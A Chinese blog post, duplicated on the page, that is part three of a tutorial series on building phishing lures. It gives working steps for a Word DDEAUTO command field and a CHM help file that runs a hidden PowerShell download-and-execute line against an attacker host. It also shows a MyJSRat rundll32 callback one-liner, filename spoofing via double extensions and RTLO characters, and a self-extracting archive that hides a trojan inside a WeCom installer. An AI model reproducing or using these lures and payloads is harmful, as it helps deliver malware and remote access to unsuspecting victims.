searchusermenu
  • 发布文章
  • 消息中心
点赞
收藏
评论
分享
原创

网站钓鱼常见方法(三)

2023-05-16 09:33:10
76
0

网络钓鱼是一种网络攻击形式,攻击者伪装成合法实体以诱骗个人泄露敏感信息,例如密码、信用卡号或其他个人详细信息。 而随着互联网资产多样性的增加,出现了越来越多不同类型的钓鱼方法,本文接着介绍一些常见的钓鱼方法。

一、诱饵制作

1.Word DDE

Microsoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。

这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容,比如说在一个 word 文档里引用了另一个 excel 表格里的某项内容,通过连接域 (Field) 的方式可以实现在 excel 里更新内容后 word 中同步更新的效果,问题出在这个域的内容可以是一个公式 (或者说表达式),这个公式并不限制内容。

可利用性

不需要本地文件启用宏,但是过不了火绒

制作过程

新建Word文档,CTRL+F9,在文档中出现"{}"之后在大括号之间输入代码,保存文件
代码:DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" 

2.CHM文档

CHM是Windows帮助文件(如电子书)使用的扩展名,此文件可以被植入可执行代码。

可利用性

较低,目前chm文件较少见,且火绒会提示危险连接,但是不会杀

制作过程

第一步、制作html页面

创建空文件夹,再创建html页面,代码如下

<!DOCTYPE html>
<html>
<head>
<title>Mousejack replay</title>
</head>
<body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",这里填写你想要执行的payload">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>

payload(注意:",payload"此处,payload前面要加一个英文版的逗号,,否则打开chm文档时会出错)
calc:,calc.exe
cs:,powershell.exe, -nop -w hidden -c IEX((new-object net.webclient).downloadstring('http://192.168.203.128:80/a')) #注意:exe后面要再加一个英文版逗号,否则无法执行exe,再是注意生成出来的payload字符串的双引号跟单引号的冲突

补:MyJSRat配合CHM上线(可进行交互)

MyJSRat下载地址:https://github.com/Ridter/MyJSRat

第一步、服务启动
python2 MyJSRat.py -i 192.168.203.128 -p 8080
运行之后生成三个地址
http://host:port/connect     //受害者的回连监听地址
http://host:port/wtf          //恶意代码的存放地址
http://host:port/hook
第二步、访问网页获取payload
http://192.168.203.128:8080/wtf
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.203.128:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
第三步、插入上述html网页中
注意exe后面加,以及单双引号冲突

第二步、EasyCHM制作CHM文档

新建工程-打开上步创建的空文件夹做为工作目录-编译生成chm文档

第三步、伪造CHM文档

第一步、拿一个正常的CHM文件转为html
hh -decompile .\\html CSS2.0中文手册.chm
第二步、钓鱼html嵌入到 html/css2/c_color.html
第三步、使用EasyCHM新建目录打开css2目录编译

第四步、诱导点击chm上线

需要诱导用户点击对应html
如:第三步一定要诱导用户点击到 c_color.html 模块才可以

3.CHM bypass WAF

法一、powershell

利用powershell无参运行,但是要把powershell脚本打包编译成chm,然后利用自带hh.exe 。hh.exe具有decompile(反编译,将chm返回成html,其实就类似chm可以比喻成一个压缩包,decompile是解压缩)的功能,可以将打包进chm的文件释放出来。

HH.EXE -decompile C:\Windows\Temp ./XMLconvert.chm

法二、js

CHM本身支持js(jscript)语法,可以利用c#写个弹shell的,然后利用利用DotNetToJScript转js,然后在把js混淆加密进行打包免杀,利用cscript或者wscript来执行js。类似的还有执行hta文件等等。

4.文件名隐藏

文件名隐藏配合ResourceHacker文件图标修改效果更佳。

法一、超长文件名隐藏

利用windows目录默认显示文件名长度特征,进行修改将文件名加长隐藏后缀名,默认显示其真实样式并且修改图标

可利用性:较低,易被发现

制作过程:

修改文件名长度

法二、经典的隐藏文件扩展名

window默认隐藏已知的文件扩展名,所以可利用此特性编写文件名来隐藏后缀名

可利用性:低,易被发现

制作过程:

修改文件名evil.jpg.exe

法三、截图.src

.scr 扩展名的运行方式与 .exe 完全相同

可利用性:较低,易被发现

制作过程:

修改文件名.src

法四、文件后缀RTLO

使用从右到左覆盖字符 (RLO),因此用户会看到类似“exe.jpg”的内容,而系统会看到前面带有 unicode 字符的“gpj.exe”。

可利用性:诱导点击可能性高,但有时候会被杀软查到

制作过程:

第一步、修改文件名

testgpj.scr

第二步、插入unicode控制字符

将光标放在 gpj 之前,右键单击,然后将鼠标悬停在“插入 Unicode 控制字符”上,选择“Start of right-to-left override”,名称现在应为“testrcs.jpg”

5.自解压

利用winrar工具创建自解压文件执行恶意木马文件。

winrar下载:https://www.rarlab.com

ResourceHacker下载:http://www.angusj.com/resourcehacker

制作过程

第一步、准备要伪装的安装包及木马

第二步、利用ResourceHacker工具(该工具可查看,修改,添加,删除,重命名,提取Windows可执行文件和资源文件的资源并进行替换)修改自解压文件资源。

1.导出真实安装包的图标资源

打开安装包文件,选择Icon Group,save图标文件

2.导入图标文件到木马文件

打开木马文件,选择Icon Group,Relpace图标文件,保存

第三步、创建自解压文件执行安装程序和木马文件

1.选择创建自解压文件

2.设置自解压路径

解压至C:\Windows\Temp

3.设置需要运行的文件

C:\Windows\Temp\WeCom_4.0.8.6027.exe

C:\Windows\Temp\WeCom_4.0.8.6027马.exe

4.设置模式

设置为全部隐藏

5.设置更新

设置为覆盖所有文件

0条评论
0 / 1000
Icecream
9文章数
0粉丝数
Icecream
9 文章 | 0 粉丝
原创

网站钓鱼常见方法(三)

2023-05-16 09:33:10
76
0

网络钓鱼是一种网络攻击形式,攻击者伪装成合法实体以诱骗个人泄露敏感信息,例如密码、信用卡号或其他个人详细信息。 而随着互联网资产多样性的增加,出现了越来越多不同类型的钓鱼方法,本文接着介绍一些常见的钓鱼方法。

一、诱饵制作

1.Word DDE

Microsoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。

这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容,比如说在一个 word 文档里引用了另一个 excel 表格里的某项内容,通过连接域 (Field) 的方式可以实现在 excel 里更新内容后 word 中同步更新的效果,问题出在这个域的内容可以是一个公式 (或者说表达式),这个公式并不限制内容。

可利用性

不需要本地文件启用宏,但是过不了火绒

制作过程

新建Word文档,CTRL+F9,在文档中出现"{}"之后在大括号之间输入代码,保存文件
代码:DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" 

2.CHM文档

CHM是Windows帮助文件(如电子书)使用的扩展名,此文件可以被植入可执行代码。

可利用性

较低,目前chm文件较少见,且火绒会提示危险连接,但是不会杀

制作过程

第一步、制作html页面

创建空文件夹,再创建html页面,代码如下

<!DOCTYPE html>
<html>
<head>
<title>Mousejack replay</title>
</head>
<body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",这里填写你想要执行的payload">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>

payload(注意:",payload"此处,payload前面要加一个英文版的逗号,,否则打开chm文档时会出错)
calc:,calc.exe
cs:,powershell.exe, -nop -w hidden -c IEX((new-object net.webclient).downloadstring('http://192.168.203.128:80/a')) #注意:exe后面要再加一个英文版逗号,否则无法执行exe,再是注意生成出来的payload字符串的双引号跟单引号的冲突

补:MyJSRat配合CHM上线(可进行交互)

MyJSRat下载地址:https://github.com/Ridter/MyJSRat

第一步、服务启动
python2 MyJSRat.py -i 192.168.203.128 -p 8080
运行之后生成三个地址
http://host:port/connect     //受害者的回连监听地址
http://host:port/wtf          //恶意代码的存放地址
http://host:port/hook
第二步、访问网页获取payload
http://192.168.203.128:8080/wtf
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.203.128:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
第三步、插入上述html网页中
注意exe后面加,以及单双引号冲突

第二步、EasyCHM制作CHM文档

新建工程-打开上步创建的空文件夹做为工作目录-编译生成chm文档

第三步、伪造CHM文档

第一步、拿一个正常的CHM文件转为html
hh -decompile .\\html CSS2.0中文手册.chm
第二步、钓鱼html嵌入到 html/css2/c_color.html
第三步、使用EasyCHM新建目录打开css2目录编译

第四步、诱导点击chm上线

需要诱导用户点击对应html
如:第三步一定要诱导用户点击到 c_color.html 模块才可以

3.CHM bypass WAF

法一、powershell

利用powershell无参运行,但是要把powershell脚本打包编译成chm,然后利用自带hh.exe 。hh.exe具有decompile(反编译,将chm返回成html,其实就类似chm可以比喻成一个压缩包,decompile是解压缩)的功能,可以将打包进chm的文件释放出来。

HH.EXE -decompile C:\Windows\Temp ./XMLconvert.chm

法二、js

CHM本身支持js(jscript)语法,可以利用c#写个弹shell的,然后利用利用DotNetToJScript转js,然后在把js混淆加密进行打包免杀,利用cscript或者wscript来执行js。类似的还有执行hta文件等等。

4.文件名隐藏

文件名隐藏配合ResourceHacker文件图标修改效果更佳。

法一、超长文件名隐藏

利用windows目录默认显示文件名长度特征,进行修改将文件名加长隐藏后缀名,默认显示其真实样式并且修改图标

可利用性:较低,易被发现

制作过程:

修改文件名长度

法二、经典的隐藏文件扩展名

window默认隐藏已知的文件扩展名,所以可利用此特性编写文件名来隐藏后缀名

可利用性:低,易被发现

制作过程:

修改文件名evil.jpg.exe

法三、截图.src

.scr 扩展名的运行方式与 .exe 完全相同

可利用性:较低,易被发现

制作过程:

修改文件名.src

法四、文件后缀RTLO

使用从右到左覆盖字符 (RLO),因此用户会看到类似“exe.jpg”的内容,而系统会看到前面带有 unicode 字符的“gpj.exe”。

可利用性:诱导点击可能性高,但有时候会被杀软查到

制作过程:

第一步、修改文件名

testgpj.scr

第二步、插入unicode控制字符

将光标放在 gpj 之前,右键单击,然后将鼠标悬停在“插入 Unicode 控制字符”上,选择“Start of right-to-left override”,名称现在应为“testrcs.jpg”

5.自解压

利用winrar工具创建自解压文件执行恶意木马文件。

winrar下载:https://www.rarlab.com

ResourceHacker下载:http://www.angusj.com/resourcehacker

制作过程

第一步、准备要伪装的安装包及木马

第二步、利用ResourceHacker工具(该工具可查看,修改,添加,删除,重命名,提取Windows可执行文件和资源文件的资源并进行替换)修改自解压文件资源。

1.导出真实安装包的图标资源

打开安装包文件,选择Icon Group,save图标文件

2.导入图标文件到木马文件

打开木马文件,选择Icon Group,Relpace图标文件,保存

第三步、创建自解压文件执行安装程序和木马文件

1.选择创建自解压文件

2.设置自解压路径

解压至C:\Windows\Temp

3.设置需要运行的文件

C:\Windows\Temp\WeCom_4.0.8.6027.exe

C:\Windows\Temp\WeCom_4.0.8.6027马.exe

4.设置模式

设置为全部隐藏

5.设置更新

设置为覆盖所有文件

文章来自个人专栏
文章 | 订阅
0条评论
0 / 1000
请输入你的评论
0
0